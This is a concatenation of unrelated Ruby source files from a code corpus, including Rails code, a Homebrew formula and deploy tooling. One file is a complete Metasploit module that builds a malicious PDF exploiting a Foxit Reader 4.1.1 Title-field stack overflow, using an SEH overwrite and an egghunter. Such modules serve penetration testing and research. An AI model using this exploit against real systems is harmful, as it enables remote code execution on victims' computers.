sn = SendNsca.new @options
begin
sn.send plugin_status , plugin_output
rescue SendNsca::SendNscaError => e
raise RuntimeError, "send_nsca failed: #{e.message}"
end
end
end
end
protected
def options_valid?
raise OptionParser::MissingArgument, "NSCA hostname (-H) must be specified" if @options[:nsca_hostname].nil? and @options[:mode] == 'passive'
raise OptionParser::MissingArgument, "service description (-S) must be specified" if @options[:svc_descr].nil? and @options[:mode] == 'passive'
end
def config_options?
cfg_file = nil
cfg_file = @options[:senedsa_config] unless @options[:senedsa_config].nil?
cfg_file = DEFAULT_SENEDSA_CONFIG_FILE if @options[:senedsa_config].nil? and File.readable? DEFAULT_SENEDSA_CONFIG_FILE
unless cfg_file.nil?
@options.merge!(Senedsa::SendNsca.configure(cfg_file))
@options[:senedsa_config] = cfg_file
end
end
end
end end | 44.192308 | 166 | 0.585105 |
4af58e7211d2d33b4622e8032434ee6030de6140 | 343 | require 'xml/libxml'
require 'test/unit'
# Exercises the deprecated `require 'xml/libxml'` entry point: parsing
# through the XML namespace must still yield the classic parser and
# document classes.
class TestDeprecatedRequire < Test::Unit::TestCase
  XML_FIXTURE = '<ruby_array uga="booga" foo="bar"><fixnum>one</fixnum><fixnum>two</fixnum></ruby_array>'

  def test_basic
    parser = XML::Parser.string(XML_FIXTURE)
    assert_instance_of(XML::Parser, parser)
    @doc = parser.parse
    assert_instance_of(XML::Document, @doc)
  end
end
| 28.583333 | 118 | 0.71137 |
d57beef1353a6a377978be852552667f7ccb6410 | 214 | class CreateEnglishQuizQuestions < ActiveRecord::Migration[5.1]
def change
create_table :english_quiz_questions do |t|
t.string :question
t.text :explanation
t.timestamps
end
end
end
| 19.454545 | 63 | 0.705607 |
1106a20b9104349dad7d73d461a1b2779c5f8a83 | 1,888 | class Bazelisk < Formula
desc "User-friendly launcher for Bazel"
homepage "https://github.com/bazelbuild/bazelisk/"
url "https://github.com/bazelbuild/bazelisk.git",
tag: "v1.7.5",
revision: "089a39a3f896a43e759e0b494e4acfe2982aca7e"
license "Apache-2.0"
head "https://github.com/bazelbuild/bazelisk.git"
bottle do
sha256 cellar: :any_skip_relocation, big_sur: "73266bab3d913f636851157fdc060c8ac6e1001c4dfccab5e0e84dbb94770aa8"
sha256 cellar: :any_skip_relocation, catalina: "624a6f20edb7a0f1fe6990320b87478286d721ec0fcff432671350068cb6413d"
sha256 cellar: :any_skip_relocation, mojave: "57e61c1c3fedc11a46a96e7b29cb3fdf0d77b123ac6baadfc9e24c26f4fcee83"
sha256 cellar: :any_skip_relocation, x86_64_linux: "44f0328a917bab5ac35acd0fa067f3fbfbab81789e991adc465dbec3e8149cd7"
end
depends_on "go" => :build
conflicts_with "bazel", because: "Bazelisk replaces the bazel binary"
resource "bazel_zsh_completion" do
url "https://raw.githubusercontent.com/bazelbuild/bazel/036e533/scripts/zsh_completion/_bazel"
sha256 "4094dc84add2f23823bc341186adf6b8487fbd5d4164bd52d98891c41511eba4"
end
def install
system "go", "build", *std_go_args, "-ldflags", "-X main.BazeliskVersion=#{version}"
bin.install_symlink "bazelisk" => "bazel"
resource("bazel_zsh_completion").stage do
zsh_completion.install "_bazel"
end
end
test do
ENV["USE_BAZEL_VERSION"] = Formula["bazel"].version
assert_match "Build label: #{Formula["bazel"].version}", shell_output("#{bin}/bazelisk version")
# This is an older than current version, so that we can test that bazelisk
# will target an explicit version we specify. This version shouldn't need to
# be bumped.
ENV["USE_BAZEL_VERSION"] = "0.28.0"
assert_match "Build label: 0.28.0", shell_output("#{bin}/bazelisk version")
end
end
| 40.170213 | 121 | 0.74947 |
1dfbf179927c92b34b2946c69603530b88f30750 | 780 | # frozen_string_literal: true
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
module Google
  module Cloud
    module Tasks
      module V2
        # Gem version for the generated google-cloud-tasks-v2 client.
        VERSION = "0.3.0"
      end
    end
  end
end
| 26.896552 | 74 | 0.730769 |
acc79c8a9d7d76dab110da628b0d748ff699898f | 957 | # frozen_string_literal: true
# JSON API for products the signed-in staff member has assigned to
# themselves, optionally narrowed to those they have not replied to yet.
class API::Products::SelfAssignedController < API::BaseController
  before_action :require_staff_login_for_api

  # Lists self-assigned products. params[:target] selects the scope and
  # is clamped to the allowlist (default: 'self_assigned_no_replied').
  def index
    @target = params[:target]
    @target = 'self_assigned_no_replied' unless target_allowlist.include?(@target)

    base_scope =
      if @target == 'self_assigned_all'
        Product.self_assigned_product(current_user.id)
      else
        Product.self_assigned_no_replied_products(current_user.id)
      end
    @products = base_scope
                .unchecked
                .list
                .order_for_list
                .page(params[:page])
  end

  private

  # Permitted values for params[:target].
  def target_allowlist
    %w[self_assigned_no_replied self_assigned_all]
  end
end
| 31.9 | 82 | 0.560084 |
1d112e80e86ebdf688d4e1dee8b58b8247e6d4c3 | 418 | class CreateCustomers < ActiveRecord::Migration
def change
create_table :customers do |t|
t.integer :company_id
t.string :first_name
t.string :last_name
t.string :email_address
t.string :phone_number
t.string :address
t.string :city
t.string :state
t.string :zip
t.boolean :published, :default => true
t.timestamps
end
end
end
| 22 | 47 | 0.619617 |
03d9109602ff875146a0e4329048eb8b9e2c74be | 297 | k1 = "Ping Pong Ping Pong Ping Pong Ping Pong Ping Pong Ping Pong Ping Pong Ping Pong Ping Pong Ping Pong";
k2 = "Pong Ping Pong Ping Pong Ping Pong Ping Pong Ping Pong Ping Pong Ping Pong Ping Pong Ping Pong Ping";
h = {k1 => 0, k2 => 0};
# BUG FIX: in Ruby every Integer is truthy -- including 0 -- so the original
# condition `i % 2 ? k2 : k1` always evaluated to k2 and k1's count stayed 0.
# Use Integer#odd? so the two hash keys actually alternate as intended.
3000000.times { |i| k = i.odd? ? k2 : k1; h[k] += 1 }
| 59.4 | 107 | 0.659933 |
018618dd634c88f084b87368eb1f3bd0a9c6c08c | 1,003 | # -*- encoding: utf-8 -*-
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'log_runes/version'
# Gem specification for log_runes (see lib/log_runes/version.rb for VERSION).
Gem::Specification.new do |gem|
  gem.name          = "log_runes"
  gem.version       = LogRunes::VERSION
  gem.authors       = ["wlipa"]
  gem.email         = ["[email protected]"]
  gem.description   = %q{Encodes session and request ids into the Rails log output using Unicode single-width characters, thereby using only a minimum amount of column width but allowing easy grepping for an individual session or request.}
  gem.summary       = %q{Encodes session and request ids into the Rails log output for easy grepping}
  gem.homepage      = ""
  # Package every file tracked by git; anything under bin/ becomes an executable.
  gem.files         = `git ls-files`.split($/)
  gem.executables   = gem.files.grep(%r{^bin/}).map{ |f| File.basename(f) }
  gem.test_files    = gem.files.grep(%r{^(test|spec|features)/})
  gem.require_paths = ["lib"]
  gem.required_ruby_version = '>= 2.2.0' # cleaner log file rotation
end
| 45.590909 | 239 | 0.671984 |
f8903d94cec13965648f1f9b1c8c1d4095e27be9 | 1,286 | # frozen_string_literal: true
# Mixin adding the `attr_autocomplete_username_as` class macro: it exposes a
# virtual `<attr>_username` reader/writer pair that maps a username string to
# the underlying User association (useful for autocomplete form fields).
module AutoCompleteUsername
  extend ActiveSupport::Concern
  module ClassMethods
    # Defines `<user_attr>_username` and `<user_attr>_username=` for the given
    # association and, after validation, copies the association's errors onto
    # the virtual attribute so forms can display them next to the text field.
    def attr_autocomplete_username_as(user_attr)
      attribute_name = :"#{user_attr}_username"
      # def second_author_username
      #   @second_author_username || second_author.try(:username)
      # end
      define_method(attribute_name) do
        instance_variable_get(:"@#{attribute_name}") || send(user_attr.to_sym).try(:username)
      end
      # def second_author_username=(username)
      #   @second_author_username = username.try(:strip)
      #   self.second_author = @second_author_username.present? ? User.find_by_username(@second_author_username) : nil
      #   @second_author_username
      # end
      # NOTE(review): the example above says find_by_username; the generated
      # writer below uses the equivalent User.find_by(username: ...).
      define_method(:"#{attribute_name}=") do |username|
        username = username.try(:strip)
        instance_variable_set(:"@#{attribute_name}", username)
        send(:"#{user_attr}=", (username.present? ? User.find_by(username: username) : nil))
        username
      end
      # transfer errors to virtual attribute
      after_validation do
        errors[:"#{user_attr}_id"].each { |error| errors.add(attribute_name, error) }
        errors[user_attr.to_sym].each { |error| errors.add(attribute_name, error) }
      end
    end
  end
end
| 35.722222 | 118 | 0.679627 |
ed470530d7645a362248851c7da6a8402a836f9f | 2,508 | # frozen_string_literal: true
module Crafty
  module ToolStateMachine
    # State-machine host for a SketchUp tool: it owns the current Mode, the
    # tool's bounding box, and the status-bar/VCB UI state.
    class Tool
      # @return [Proc] a block that returns the initial [Mode] for the tool.
      attr_accessor :activator
      # @return [Geom::BoundingBox] the bounding box containing the points of interest to the tool
      attr_accessor :bounds
      # @return [Array]
      attr_accessor :vcb_mode
      # @return [Geom::Bounds2d]
      attr_accessor :drag_rect
      # @yield [] a block that is called whenever the tool is activated
      # @yieldreturn [Mode] the initial state for the tool
      def initialize(&activator)
        @activator = activator
        @bounds = Geom::BoundingBox.new
        @vcb_mode = Mode::NULL_VCB_STATE
        @status_text = ''
        @drag_rect = nil
      end
      # Transitions the tool to `mode`. A nil or unchanged mode only refreshes
      # the UI. On a real transition the old mode's deactivate hook and the new
      # mode's activate hook fire, then this method recurses with whatever
      # `on_resume` returns. Reaching Mode::END_OF_OPERATION clears the status
      # bar and VCB and deselects the tool.
      # @param mode [Mode]
      # @param view [Sketchup::View]
      # @param force_ui_update [Boolean]
      def apply_mode(mode, view = Sketchup.active_model.active_view, force_ui_update: false)
        if !mode.nil? && mode != @mode
          @mode.deactivate_mode self, mode, view unless @mode.nil?
          mode.activate_mode self, @mode, view
          @mode = mode
          self.apply_mode @mode.on_resume(self, view), view, force_ui_update: force_ui_update
          if mode == Mode::END_OF_OPERATION
            Sketchup.status_text = nil
            Sketchup.vcb_label = nil
            Sketchup.vcb_value = nil
            Sketchup.active_model.select_tool nil
            return
          end
        end
        self.update_ui force_ui_update
      end
      # Pushes the current mode's VCB tuple and status line to SketchUp,
      # skipping writes that would not change what is already displayed
      # (unless `force` is set).
      def update_ui(force = false)
        new_vcb = @mode.vcb
        if force || new_vcb != self.vcb_mode
          self.vcb_mode = new_vcb
          Sketchup.vcb_label = new_vcb[1]
          Sketchup.vcb_value = new_vcb[2]
        end
        new_status = [@mode.status, @mode.chordset.status].reject(&:nil?).reject(&:empty?).join(' ||| ')
        if force || new_status != @status_text
          @status_text = new_status
          Sketchup.status_text = new_status
        end
      end
      # Converts the 2D drag rectangle into four Point3d corners (z = 0),
      # ordered upper-left, upper-right, lower-right, lower-left.
      def drag_rect_to_pts3d
        r = self.drag_rect
        x_min = r.upper_left.x
        y_min = r.upper_left.y
        x_max = r.lower_right.x
        y_max = r.lower_right.y
        [
          Geom::Point3d.new(x_min, y_min),
          Geom::Point3d.new(x_max, y_min),
          Geom::Point3d.new(x_max, y_max),
          Geom::Point3d.new(x_min, y_max),
        ]
      end
    end # class Tool
  end # module ToolStateMachine
end # module Crafty
| 31.746835 | 110 | 0.602472 |
114d1e7a379cb5fc3f0278af6c1b4aeab161aaa6 | 479 | xml.instruct!
# Atom feed of a user's activity events (Builder template; expects @user,
# @events, and the event_to_atom helper from the rendering context).
xml.feed "xmlns" => "http://www.w3.org/2005/Atom", "xmlns:media" => "http://search.yahoo.com/mrss/" do
  xml.title "#{@user.name} activity"
  # Self link is this Atom document; alternate is the user's HTML page.
  xml.link href: user_url(@user, :atom), rel: "self", type: "application/atom+xml"
  xml.link href: user_url(@user), rel: "alternate", type: "text/html"
  xml.id user_url(@user)
  # Feed timestamp comes from the newest event, when any exist.
  xml.updated @events.latest_update_time.xmlschema if @events.any?
  @events.each do |event|
    event_to_atom(xml, event)
  end
end
| 36.846154 | 102 | 0.665971 |
2871afff3786819f31484e9615b75fc0c8039e5f | 468 | module Locomotive
module Steam
class EditableElementService
include Locomotive::Steam::Services::Concerns::Decorator
attr_accessor_initialize :repository, :locale
def find(page, block, slug)
decorate(Decorators::I18nDecorator) do
repository.editable_element_for(page, block, slug).tap do |element|
element.base_url = repository.base_url(page) if element
end
end
end
end
end
end
| 21.272727 | 77 | 0.668803 |
ff28039bafb8df5b241349e50574be56eccca676 | 391 | # frozen_string_literal: true
module Jekyll
  module Drops
    # Liquid drop exposing a collection's public data to templates
    # (site.collections entries).
    class CollectionDrop < Drop
      extend Forwardable
      # Collection drops are read-only from Liquid.
      mutable false
      # `collection.output` in templates mirrors whether the collection is
      # written to disk.
      def_delegator :@obj, :write?, :output
      def_delegators :@obj, :label, :docs, :files, :directory, :relative_directory
      # Unknown keys fall back to the collection's metadata hash.
      private def_delegator :@obj, :metadata, :fallback_data
      def to_s
        docs.to_s
      end
    end
  end
end
| 18.619048 | 82 | 0.654731 |
87557d67bbdc308b5146f00c5828f9f540c434dd | 11,591 | require 'aws-sdk'
require 'timeout'
# Orchestrates zero-downtime ("rolling") deploys of an AWS OpsWorks app:
# each online instance in a layer is deregistered from its Elastic Load
# Balancers, deployed to (with migrations), then re-attached. Deploys can be
# serialized across machines with an optional Redis-backed semaphore.
class OpsworksInteractor
  begin
    require 'redis-semaphore'
  rescue LoadError
    # suppress, this is handled at runtime in with_deploy_lock
  end
  DeployLockError = Class.new(StandardError)
  # All opsworks endpoints are in the us-east-1 region, see:
  # http://docs.aws.amazon.com/opsworks/latest/userguide/cli-examples.html
  OPSWORKS_REGION = 'us-east-1'
  # @param access_key_id [String] AWS credential used for both clients
  # @param secret_access_key [String] AWS credential used for both clients
  # @param redis [Hash, nil] optional Redis config enabling deploy locking
  def initialize(access_key_id, secret_access_key, redis: nil)
    # All opsworks endpoints are always in the OPSWORKS_REGION
    @opsworks_client = Aws::OpsWorks::Client.new(
      access_key_id: access_key_id,
      secret_access_key: secret_access_key,
      region: OPSWORKS_REGION
    )
    @elb_client = Aws::ElasticLoadBalancing::Client.new(
      access_key_id: access_key_id,
      secret_access_key: secret_access_key,
      region: ENV['AWS_REGION'] || OPSWORKS_REGION
    )
    # Redis host and port may be supplied if you want to run your deploys with
    # mutual exclusive locking (recommended)
    # Example redis config: { host: 'foo', port: 42 }
    @redis = redis
  end
  # Runs only ONE rolling deploy at a time.
  #
  # If another one is currently running, waits for it to finish before starting
  def rolling_deploy(**kwargs)
    with_deploy_lock do
      rolling_deploy_without_lock(**kwargs)
    end
  end
  # Deploys the given app_id on the given instance_id in the given stack_id
  #
  # Blocks until AWS confirms that the deploy was successful
  #
  # Returns a Aws::OpsWorks::Types::CreateDeploymentResult
  # NOTE(review): the 30.minutes default relies on ActiveSupport's numeric
  # extensions being loaded by the host app -- confirm.
  def deploy(stack_id:, app_id:, instance_id:, deploy_timeout: 30.minutes)
    response = @opsworks_client.create_deployment(
      stack_id: stack_id,
      app_id: app_id,
      instance_ids: [instance_id],
      command: {
        name: 'deploy',
        args: {
          'migrate' => ['true'],
        }
      }
    )
    log("Deploy process running (id: #{response[:deployment_id]})...")
    wait_until_deploy_completion(response[:deployment_id], deploy_timeout)
    log("✓ deploy completed")
    response
  end
  private
  # Polls Opsworks for timeout seconds until deployment_id has completed
  def wait_until_deploy_completion(deployment_id, timeout)
    # NOTE(review): started_at is never read -- presumably leftover
    # instrumentation; confirm before removing.
    started_at = Time.now
    Timeout::timeout(timeout) do
      @opsworks_client.wait_until(
        :deployment_successful,
        deployment_ids: [deployment_id]
      ) do |w|
        # disable max attempts
        w.max_attempts = nil
      end
    end
  end
  # Loop through all instances in layer
  # Deregister from ELB (elastic load balancer)
  # Wait connection draining timeout (default up to maximum of 300s)
  # Initiate deploy and run migrations
  # Register instance back to ELB
  # Wait for AWS to confirm the instance as registered and healthy
  # Once complete, move onto the next instance and repeat
  def rolling_deploy_without_lock(stack_id:, layer_id:, app_id:)
    log("Starting opsworks deploy for app #{app_id}\n\n")
    instances = @opsworks_client.describe_instances(layer_id: layer_id)[:instances]
    instances.each do |instance|
      # Only deploy to online instances
      next unless instance.status == 'online'
      begin
        log("=== Starting deploy for #{instance.hostname} ===")
        load_balancers = detach_from_elbs(instance: instance)
        deploy(
          stack_id: stack_id,
          app_id: app_id,
          instance_id: instance.instance_id
        )
      ensure
        # load_balancers is nil here when detach_from_elbs raised before
        # returning, so re-attach is skipped in that case.
        # NOTE(review): if detach_from_elbs fails after deregistering from
        # some ELBs, those are never re-attached -- confirm acceptable.
        attach_to_elbs(instance: instance, load_balancers: load_balancers) if load_balancers
        log("=== Done deploying on #{instance.hostname} ===\n\n")
      end
    end
    log("SUCCESS: completed opsworks deploy for all instances on app #{app_id}")
  end
  # Executes the given block only after obtaining an exclusive lock on the
  # deploy semaphore.
  #
  # EXPLANATION
  # ===========
  #
  # If two or more rolling deploys were to execute simultanously, there is a
  # possibility that all instances could be detached from the load balancer
  # at the same time.
  #
  # Although we check that other instances are attached before detaching, there
  # could be a case where a deploy was running simultaneously on each instance
  # of a pair. A race would then be possible where each machine sees the
  # presence of the other instance and then both are detached. Now the load
  # balancer has no instances to send traffic to
  #
  # Result: downtime and disaster.
  #
  # By executing the code within the context of a lock on a shared global deploy
  # mutex, deploys are forced to run in serial, and only one machine is detached
  # at a time.
  #
  # Result: disaster averted.
  DEPLOY_WAIT_TIMEOUT = 600 # max seconds to wait in the queue, once this has expired the process will raise
  def with_deploy_lock
    if !defined?(Redis::Semaphore)
      log(<<-MSG.squish)
        Redis::Semaphore not found, will attempt to deploy without locking.\n
        WARNING: this could cause undefined behavior if two or more deploys
        are run simultanously!\n
        It is recommended that you use semaphore locking. To fix this, add
        `gem 'redis-semaphore'` to your Gemfile and run `bundle install`.
      MSG
      yield
    elsif !@redis
      log(<<-MSG.squish)
        Redis::Semaphore was found but :redis was not set, will attempt to
        deploy without locking.\n
        WARNING: this could cause undefined behavior if two or more deploys
        are run simultanously!\n
        It is recommended that you use semaphore locking. To fix this, supply a
        :redis hash like { host: 'foo', port: 42 } .
      MSG
      yield
    else
      s = Redis::Semaphore.new(:deploy, **@redis)
      log("Waiting for deploy lock...")
      success = s.lock(DEPLOY_WAIT_TIMEOUT) do
        log("Got lock. Running deploy...")
        yield
        log("Deploy complete. Releasing lock...")
        true
      end
      if success
        log("Lock released")
        true
      else
        fail(DeployLockError, "could not get deploy lock within #{DEPLOY_WAIT_TIMEOUT} seconds")
      end
    end
  end
  # Takes a Aws::OpsWorks::Types::Instance
  #
  # Detaches the provided instance from all of its load balancers
  #
  # Returns the detached load balancers as an array of
  # Aws::ElasticLoadBalancing::Types::LoadBalancerDescription
  #
  # Blocks until AWS confirms that all instances successfully detached before
  # returning
  #
  # Does not wait and instead returns an empty array if no load balancers were
  # found for this instance
  def detach_from_elbs(instance:)
    unless instance.is_a?(Aws::OpsWorks::Types::Instance)
      fail(ArgumentError, "instance must be a Aws::OpsWorks::Types::Instance struct")
    end
    all_load_balancers = @elb_client.describe_load_balancers
      .load_balancer_descriptions
    load_balancers = detach_from(all_load_balancers, instance)
    lb_wait_params = []
    load_balancers.each do |lb|
      params = {
        load_balancer_name: lb.load_balancer_name,
        instances: [{ instance_id: instance.ec2_instance_id }]
      }
      remaining_instances = @elb_client
        .deregister_instances_from_load_balancer(params)
        .instances
      log(<<-MSG.squish)
        Will detach instance #{instance.ec2_instance_id} from
        #{lb.load_balancer_name} (remaining attached instances:
        #{remaining_instances.map(&:instance_id).join(', ')})
      MSG
      lb_wait_params << params
    end
    if lb_wait_params.any?
      lb_wait_params.each do |params|
        # wait for all load balancers to list the instance as deregistered
        @elb_client.wait_until(:instance_deregistered, params)
        log("✓ detached from #{params[:load_balancer_name]}")
      end
    else
      log("No load balancers found for instance #{instance.ec2_instance_id}")
    end
    load_balancers
  end
  # Accepts load_balancers as array of
  # Aws::ElasticLoadBalancing::Types::LoadBalancerDescription
  # and instances as a Aws::OpsWorks::Types::Instance
  #
  # Returns only the LoadBalancerDescription objects that have the instance
  # attached and should be detached from
  #
  # Will not include a load balancer in the returned collection if the
  # supplied instance is the ONLY one connected. Detaching the sole remaining
  # instance from a load balancer would probably cause undesired results.
  def detach_from(load_balancers, instance)
    check_arguments(instance: instance, load_balancers: load_balancers)
    load_balancers.select do |lb|
      matched_instance = lb.instances.any? do |lb_instance|
        instance.ec2_instance_id == lb_instance.instance_id
      end
      if matched_instance && lb.instances.count > 1
        # We can detach this instance safely because there is at least one other
        # instance to handle traffic
        true
      elsif matched_instance && lb.instances.count == 1
        # We can't detach this instance because it's the only one
        log(<<-MSG.squish)
          Will not detach #{instance.ec2_instance_id} from load balancer
          #{lb.load_balancer_name} because it is the only instance connected
        MSG
        false
      else
        # This load balancer isn't attached to this instance
        false
      end
    end
  end
  # Takes an instance as a Aws::OpsWorks::Types::Instance
  # and load balancers as an array of
  # Aws::ElasticLoadBalancing::Types::LoadBalancerDescription
  #
  # Attaches the provided instance to the supplied load balancers and blocks
  # until AWS confirms that the instance is attached to all load balancers
  # before returning
  #
  # Does nothing and instead returns an empty hash if load_balancers is empty
  #
  # Otherwise returns a hash of load balancer names each with a
  # Aws::ElasticLoadBalancing::Types::RegisterEndPointsOutput
  def attach_to_elbs(instance:, load_balancers:)
    check_arguments(instance: instance, load_balancers: load_balancers)
    if load_balancers.empty?
      log("No load balancers to attach to")
      return {}
    end
    lb_wait_params = []
    registered_instances = {} # return this
    load_balancers.each do |lb|
      params = {
        load_balancer_name: lb.load_balancer_name,
        instances: [{ instance_id: instance.ec2_instance_id }]
      }
      result = @elb_client.register_instances_with_load_balancer(params)
      registered_instances[lb.load_balancer_name] = result
      lb_wait_params << params
    end
    log("Re-attaching instance #{instance.ec2_instance_id} to all load balancers")
    # Wait for all load balancers to list the instance as registered
    lb_wait_params.each do |params|
      @elb_client.wait_until(:instance_in_service, params)
      log("✓ re-attached to #{params[:load_balancer_name]}")
    end
    registered_instances
  end
  # Fails unless arguments are of the expected types
  def check_arguments(instance:, load_balancers:)
    unless instance.is_a?(Aws::OpsWorks::Types::Instance)
      fail(ArgumentError,
        ":instance must be a Aws::OpsWorks::Types::Instance struct")
    end
    unless load_balancers.respond_to?(:each) &&
      load_balancers.all? do |lb|
        lb.is_a?(Aws::ElasticLoadBalancing::Types::LoadBalancerDescription)
      end
      fail(ArgumentError, <<-MSG.squish)
        :load_balancers must be a collection of
        Aws::ElasticLoadBalancing::Types::LoadBalancerDescription objects
      MSG
    end
  end
  # Could use Rails logger here instead if you wanted to
  def log(message)
    puts message
  end
end
| 32.742938 | 108 | 0.686912 |
e99625add9d790cc1db80e51782f9ad068385882 | 982 | module Lita
# Constructs a Lita plugin from a block.
# @since 4.0.0
# @api private
class PluginBuilder
# @param namespace [String, Symbol] The Redis namespace to use for the plugin.
# @yield The class body of the plugin.
def initialize(namespace, &block)
@namespace = namespace.to_s
@block = block
end
# Constructs an {Lita::Adapter} from the provided block.
# @return [Lita::Adapter]
def build_adapter
adapter = create_plugin(Adapter)
adapter.class_exec(&@block)
adapter
end
# Constructs a {Lita::Handler} from the provided block.
# @return [Lita::Handler]
def build_handler
handler = create_plugin(Handler)
handler.class_exec(&@block)
handler
end
private
# Creates a class of the relevant plugin type and sets its namespace.
def create_plugin(plugin_type)
plugin = Class.new(plugin_type)
plugin.namespace(@namespace)
plugin
end
end
end
| 25.179487 | 82 | 0.660896 |
e905b7da556e76adce4f9ae378680a012475810e | 4,844 | ##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking
  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::PDF
  include Msf::Exploit::Egghunter
  #include Msf::Exploit::Seh # unused due to special circumstances
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow',
      'Description' => %q{
          This module exploits a stack buffer overflow in Foxit PDF Reader prior to version
        4.2.0.0928. The vulnerability is triggered when opening a malformed PDF file that
        contains an overly long string in the Title field. This results in overwriting a
        structured exception handler record.
          NOTE: This exploit does not use javascript.
      },
      'License' => MSF_LICENSE,
      'Version' => "$Revision$",
      'Author' =>
        [
          'dookie', # Discovered the bug
          'Sud0', # Original exploit (from Offsec Exploit Weekend)
          'corelanc0d3r <peter.ve[at]corelan.be>', # Metasploit exploit
          'jduck' # Metasploit-fu
        ],
      'References' =>
        [
          #[ 'CVE', '' ],
          [ 'OSVDB', '68648' ],
          [ 'EDB', '15532' ],
          [ 'URL', 'http://www.corelan.be:8800/index.php/2010/11/13/offensive-security-exploit-weekend/' ]
        ],
      'Payload' =>
        {
          'BadChars' => "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0d\x2F\x5c\x3c\x3e\x5e\x7e",
          'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
          'EncoderOptions' =>
            {
              'BufferRegister' => 'EDI', # egghunter jmp edi
            }
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [ 'Foxit Reader v4.1.1 XP Universal', { 'Offset' => 540, 'Ret' => "\x4B\x6A" } ] #unicode p/p/r foxit reader.exe
        ],
      'DisclosureDate' => 'Nov 13 2010',
      'DefaultTarget' => 0))
    register_options(
      [
        OptString.new('FILENAME', [ false, 'The output filename.', 'corelan_foxit.pdf'])
      ], self.class)
  end
  # Builds the malicious Title string: decoy-title padding up to the SEH
  # offset, then nSEH + SEH (unicode pop/pop/ret), stack-alignment stub,
  # ECX setup, and the doubly-encoded egghunter. The actual payload (the
  # egg) travels separately in the PDF trailer -- see #trailer below.
  def exploit
    @label = rand_text_alpha(7)
    nseh = "\x5A\x41" # pop edx -- to make edx writable
    seh = target['Ret']
    # inc ecx / pop esp / popad / push esp / ret
    align = "\x41\x61\x5C\x5C\x41\x61\x41\x54\x41\xC3"
    ecx_control = "\xB3\x30\xB3" # becomes ecx
    hunter, @egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
    # Encode with alphamixed, then unicode mixed
    [ 'x86/alpha_mixed', 'x86/unicode_mixed' ].each { |name|
      enc = framework.encoders.create(name)
      if name =~ /unicode/
        enc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' })
      else
        enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EDX' })
      end
      # NOTE: we already eliminated badchars
      hunter = enc.encode(hunter, nil, nil, platform)
      if name =~/alpha/
        #insert getpc_stub & align EDX, unicode encoder friendly.
        #Hardcoded stub is not an issue here because it gets encoded anyway
        getpc_stub = "\x89\xe1\xdb\xcc\xd9\x71\xf4\x5a\x83\xc2\x41\x83\xea\x35"
        hunter = getpc_stub + hunter
      end
    }
    #tweak hunter, patched to make it write to ECX
    hunter[1] = "a"
    # Plausible document titles used as padding so the file looks benign.
    doctitles = [
      "Confidential : Contract + Terms of Use",
      "Contract information",
      "Acquisition contract",
      "...loading, please wait...",
      "Trademark, patent and copyright information",
      "Limited Liability Partnership",
      "Partnership agreement",
      "Last will and testament",
      "How to hack gmail",
      "Running Metasploit on Windows Mobile",
      "Free torrent sites",
      "Lady Gaga naked",
      "Free Shopping vouchers"
    ]
    sploit = ''
    sploit << doctitles[rand(doctitles.length)]
    sploit << " " * (target['Offset'] - sploit.length)
    sploit << nseh << seh
    sploit << align
    sploit << ecx_control
    sploit << hunter
    file_create(make_pdf(sploit))
  end
  # Override the mixin obfuscator since it doesn't seem to work here.
  def nObfu(str)
    return str
  end
  # Overrides the PDF mixin's trailer so the egg (the encoded payload found
  # by the egghunter) is smuggled into the trailer dictionary under the
  # random @label key.
  def trailer(root_obj)
    ret = 'trailer'
    ret << nObfu("<</Size %d/Root " % (@xref.length + 1)) << ioRef(root_obj)
    ret << nObfu("/Info ") << ioRef(5)
    ret << nObfu("/#{@label} #{@egg}")
    ret << nObfu(">>")
    ret << eol
    ret
  end
  # Minimal five-object PDF; object 5 is the /Info dictionary whose /Title
  # carries the overflow string.
  def make_pdf(sploit)
    @pdf << header('1.4')
    add_object(1, nObfu("<</ViewerPreferences<</DisplayDocTitle true>>/Outlines ") << ioRef(2) << nObfu("/Pages ") << ioRef(3) << nObfu("/Type/Catalog/Lang(en-US)>>"))
    add_object(2, nObfu("<</Type/Outlines/Count 0>>"))
    add_object(3, nObfu("<</Count 1/Type/Pages/Kids[") << ioRef(4) << nObfu("]>>"))
    add_object(4, nObfu("<</Type/Page/Parent ") << ioRef(3) << nObfu("/MediaBox[0 0 612 792]>>"))
    add_object(5, nObfu("<</Title (") + sploit + nObfu(")>>"))
    finish_pdf
  end
end
| 30.465409 | 165 | 0.638315 |
ff3e0f44921c95dcd6fe97addc21ba800a00d1c4 | 10,361 | =begin
#SendinBlue API
#SendinBlue provide a RESTFul API that can be used with any languages. With this API, you will be able to : - Manage your campaigns and get the statistics - Manage your contacts - Send transactional Emails and SMS - and much more... You can download our wrappers at https://github.com/orgs/sendinblue **Possible responses** | Code | Message | | :-------------: | ------------- | | 200 | OK. Successful Request | | 201 | OK. Successful Creation | | 202 | OK. Request accepted | | 204 | OK. Successful Update/Deletion | | 400 | Error. Bad Request | | 401 | Error. Authentication Needed | | 402 | Error. Not enough credit, plan upgrade needed | | 403 | Error. Permission denied | | 404 | Error. Object does not exist | | 405 | Error. Method not allowed | | 406 | Error. Not Acceptable |
OpenAPI spec version: 3.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.19
=end
require 'date'
module SibApiV3Sdk
class SendTransacSms
